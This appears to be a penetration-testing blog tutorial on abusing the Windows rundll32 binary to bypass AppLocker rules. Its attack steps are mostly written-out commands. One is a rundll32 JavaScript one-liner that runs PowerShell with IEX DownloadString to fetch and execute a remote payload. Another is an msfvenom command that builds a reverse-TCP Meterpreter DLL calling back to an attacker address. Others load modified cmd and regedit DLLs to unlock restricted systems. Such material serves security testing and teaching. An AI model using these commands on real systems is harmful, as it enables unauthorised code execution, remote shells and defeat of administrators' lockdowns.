Rundll32 is a Microsoft binary that can execute code that is inside a DLL file. Since this utility is part of the Windows operating system it can be used as a method in order to bypass AppLocker rules or Software Restriction Policies. So if the environment is not properly lockdown and users are permitted to use this binary then they can write their own DLL’s and bypass any restrictions or execute malicious JavaScript code.

Rundll32 – JavaScript

It possible to utilize the rundll32 binary in order to execute JavaScript code that has an embedded payload and it hosted on a webserver. The Metasploit module web delivery can quickly create a webserver that will serve a specific payload (Python, PHP or PowerShell). In this case the payload will be PowerShell.

exploit/multi/script/web_delivery
Web Delivery Module Configuration
Web Delivery Module Configuration

The following command needs to be executed from the command prompt. If the command prompt is locked then the method that is described below can be used to unlock the cmd.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Rundll32 - JavaScript
Rundll32 – JavaScript

Rundll32 will execute the arbitrary code and it will return a Meterpreter session. The main benefit of this is that since it will not touch the disk the AppLocker rule will bypassed. However PowerShell should be allowed to run on the system.

Web Delivery Payload
Web Delivery Payload

Rundll32 – Meterpreter

The Metasploit Msfvenom can be used in order to create a custom DLL that will contain a meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f dll -o pentestlab.dll
Msfvenom - DLL Generation
Msfvenom DLL Generation

The utility rundll32 can then load and execute the payload that is inside the pentestlab.dll.

rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll
Rundll32 - Injecting DLL into a Process
AppLocker Bypass – Rundll32 via DLL

A meterpreter session will be opened.

Rundll32 - Meterpreter
Rundll32 – Meterpreter

Command Prompt

In Windows systems that have locked the command prompt via an AppLocker rule it is possible to bypass this restriction by injecting a malicious DLL file into a legitimate process. Didier Stevens has released a modified version of cmd in the form of a DLL file by using an open source variant obtained from the ReactOS.

AppLocker - Command Prompt Blocked
AppLocker – Command Prompt Blocked

Since the rundll32 is a trusted Microsoft utility it can be used to load the cmd.dll into a process, execute the code on the DLL and therefore bypass the AppLocker rule and open the command prompt. The following two commands can be executed from the Windows Run:

rundll32 C:\cmd.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\cmd.dll
Rundll32 - DLL Loading Entry Point
Rundll32 – DLL Loading Entry Point
Rundll32 - DLL Loading Control Run
Rundll32 – DLL Loading Control Run

The code will be executed through rundll32 and the command prompt will be opened.

Rundll32 - Command Prompt
Rundll32 – Command Prompt

Registry

The same technique can be applied in systems where the registry is locked. Didier Stevens released also a modified version of registry editor in the form of a DLL like the command prompt above.

AppLocker - Registry Blocked
AppLocker – Registry Blocked

The following commands can load and run the regedit.dll via rundll32 and therefore bypass the AppLocker rule.

rundll32 C:\regedit.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\regedit.dll
AppLocker - Rundll32 Registry
AppLocker – Rundll32 Registry
AppLocker - Registry Unlocked
AppLocker – Registry Unlocked
AppLocker - Rundll32 Registry Unlocked
AppLocker – Rundll32 Registry Unlocked

Resources

https://blog.didierstevens.com/?s=cmd

http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

http://www.didierstevens.com/files/software/regedit-dll_v0_0_1.zip

https://github.com/fdiskyou/PSShell

http://ikat.ha.cked.net/

3 Comments

Leave a Reply to netbiosX Cancel reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s